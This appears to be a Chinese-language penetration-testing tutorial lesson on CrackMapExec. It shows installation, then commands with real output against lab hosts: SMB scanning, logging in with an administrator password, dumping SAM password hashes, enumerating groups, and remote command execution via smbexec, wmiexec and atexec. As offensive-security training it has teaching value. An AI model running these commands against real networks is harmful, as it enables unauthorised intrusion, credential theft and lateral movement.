CrackMapExec弥补了MSF4下auxiliary,scanner模块下的Command执行方式,但MSF5已解决该问题。在MSF4下,该框架针对后渗透的横向移动经常出现,虽然MSF5已解决该问题,但该框架在配合bloodhound与empire依然目前有一定优势。

安装方式:from Wiki:

但作者推荐pipenv安装:

  1. pip install ‐‐user pipenv
  2. git clone ‐‐recursive https://github.com/byt3bl33d3r/CrackMapExec
  3. cd CrackMapExec && pipenv install
  4. pipenv shell
  5. python setup.py install
  1. pip install ‐‐user crackmapexec

默认为100线程

  1. cme smb 192.168.1.0/24
  2. SMB 192.168.1.4 445 JOHNPC [*] Windows 7 Ultimate 7601 Service Pack 1
  3. x64 (name:JOHNPC) (domain:JOHNPC) (signing:False) (SMBv1:True)
  4. SMB 192.168.1.119 445 WIN03X64 [*] Windows Server 2003 R2 3790 Service
  5. Pack 2 x32 (name:WIN03X64) (domain:WIN03X64) (signing:False) (SMBv1:True)

密码策略

第九十三课:与CrackMapExec结合攻击 - 图1

list hash

  1. root@John:~# cme smb 192.168.1.119 u administrator p '123456' ‐‐sam
  2. SMB 192.168.1.119 445 WIN03X64 [*] Windows Server 2003 R2 3790 Service
  3. Pack 2 x32 (name:WIN03X64) (domain:WIN03X64) (signing:False) (SMBv1:True)
  4. SMB 192.168.1.119 445 WIN03X64 [+] WIN03X64\administrator:123456 (Pwn3d!)
  5. SMB 192.168.1.119 445 WIN03X64 [+] Dumping SAM hashes
  6. SMB 192.168.1.119 445 WIN03X64 Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  7. SMB 192.168.1.119 445 WIN03X64 Guest:501:aad3b435b51404eeaad3b435b51404ee:67f33d2095bda39fbf6b63fbadf2313a:::
  8. SMB 192.168.1.119 445 WIN03X64 SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:f4d13c67c7608094c9b0e39147f07520:::
  9. SMB 192.168.1.119 445 WIN03X64 IUSR_WIN03X64:1003:dbec20afefb6cc332311fb9822ba61ce:68c22a11c400d91fa4f66ff36b3c15dc:::
  10. SMB 192.168.1.119 445 WIN03X64 IWAM_WIN03X64:1004:ff783381e4e022de176c59bf598409c7:7e456daac229ddceccf5f367aa69a487:::
  11. SMB 192.168.1.119 445 WIN03X64 ASPNET:1008:cc26551b70faffc095feb73db16b65ff:fec6e9e4a08319a1f62cd30447247f88:::
  12. SMB 192.168.1.119 445 WIN03X64 [+] Added 6 SAM hashes to the database

  1. Pack 2 x32 (name:WIN03X64) (domain:WIN03X64) (signing:False) (SMBv1:True)
  2. SMB 192.168.1.119 445 WIN03X64 [+] WIN03X64\administrator:123456 (Pwn3d!)
  3. SMB 192.168.1.119 445 WIN03X64 [+] Enumerated local groups
  4. SMB 192.168.1.119 445 WIN03X64 HelpServicesGroup membercount: 1
  5. SMB 192.168.1.119 445 WIN03X64 IIS_WPG membercount: 4
  6. SMB 192.168.1.119 445 WIN03X64 TelnetClients membercount: 0
  7. SMB 192.168.1.119 445 WIN03X64 Administrators membercount: 1
  8. SMB 192.168.1.119 445 WIN03X64 Backup Operators membercount: 0
  9. SMB 192.168.1.119 445 WIN03X64 Distributed COM Users membercount: 0
  10. SMB 192.168.1.119 445 WIN03X64 Guests membercount: 2
  11. SMB 192.168.1.119 445 WIN03X64 Network Configuration Operators membercount: 0
  12. SMB 192.168.1.119 445 WIN03X64 Performance Log Users membercount: 1
  13. SMB 192.168.1.119 445 WIN03X64 Performance Monitor Users membercount: 0
  14. SMB 192.168.1.119 445 WIN03X64 Power Users membercount: 0
  15. SMB 192.168.1.119 445 WIN03X64 Print Operators membercount: 0
  16. SMB 192.168.1.119 445 WIN03X64 Remote Desktop Users membercount: 0
  17. SMB 192.168.1.119 445 WIN03X64 Replicator membercount: 0
  18. SMB 192.168.1.119 445 WIN03X64 Users membercount: 3

第九十三课:与CrackMapExec结合攻击 - 图2

分别支持4种执行Command,如无—exec-method执行,默认为wmiexec执行。

  • mmcexec
  • smbexec
  • wmiexec
  • atexec

基于smbexec执行Command

  1. root@John:~# cme smb 192.168.1.6 u administrator p '123456' ‐‐execmethod smbexec x 'net user'
  2. SMB 192.168.1.6 445 WIN5BMI9HGC42S [*] Windows Web Server 2008 R2 760
  3. 0 x64 (name:WIN5BMI9HGC42S) (domain:WIN5BMI9HGC42S) (signing:False) (SMBv1:True)
  4. 5BMI9HGC42S\administrator:123456 (Pwn3d!)
  5. SMB 192.168.1.6 445 WIN5BMI9HGC42S [+] Executed command via smbexec
  6. SMB 192.168.1.6 445 WIN5BMI9HGC42S
  7. SMB 192.168.1.6 445 WIN5BMI9HGC42S ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐
  8. ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐
  9. SMB 192.168.1.6 445 WIN5BMI9HGC42S Administrator Guest
  10. SMB 192.168.1.6 445 WIN5BMI9HGC42S ����������ϣ�������һ����������

基于dcom执行Command

第九十三课:与CrackMapExec结合攻击 - 图3

基于wmi执行Command

  1. root@John:~# cme smb 192.168.1.6 u administrator p '123456' ‐‐execmethod wmiexec x 'whoami'
  2. SMB 192.168.1.6 445 WIN5BMI9HGC42S [*] Windows Web Server 2008 R2 760
  3. 0 x64 (name:WIN5BMI9HGC42S) (domain:WIN5BMI9HGC42S) (signing:False) (SMBv1:True)
  4. SMB 192.168.1.6 445 WIN5BMI9HGC42S [+] WIN
  5. 5BMI9HGC42S\\administrator:123456 (Pwn3d!)
  6. SMB 192.168.1.6 445 WIN5BMI9HGC42S [+] Executed command via wmiexec
  7. SMB 192.168.1.6 445 WIN5BMI9HGC42S win5bmi9hgc42s\administrator

基于AT执行Command

  1. root@John:~# cme smb 192.168.1.6 u administrator p '123456' ‐‐execmethod atexec x 'calc'
  2. SMB 192.168.1.6 445 WIN5BMI9HGC42S [*] Windows Web Server 2008 R2 760
  3. 0 x64 (name:WIN5BMI9HGC42S) (domain:WIN5BMI9HGC42S) (signing:False) (SMBv1:True)
  4. SMB 192.168.1.6 445 WIN5BMI9HGC42S [+] WIN
  5. 5BMI9HGC42S\administrator:123456 (Pwn3d!)
  6. SMB 192.168.1.6 445 WIN5BMI9HGC42S [+] Executed command via atexec

第九十三课:与CrackMapExec结合攻击 - 图4

默认采取wmiexec执行Command,参数为-x

  1. root@John:~# cme smb 192.168.1.6 u administrator p '123456' x 'whoami'
  2. SMB 192.168.1.6 445 WIN5BMI9HGC42S [*] Windows Web Server 2008 R2 760
  3. 0 x64 (name:WIN5BMI9HGC42S) (domain:WIN5BMI9HGC42S) (signing:False) (SMBv1:True)
  4. SMB 192.168.1.6 445 WIN5BMI9HGC42S [+] WIN
  5. 5BMI9HGC42S\administrator:123456 (Pwn3d!)

枚举目标机disk

解决出现:STATUS_PIPE_DISCONNECTED
第九十三课:与CrackMapExec结合攻击 - 图5

改成经典

解决出现错误:UnicodeDecodeError:

升级impacket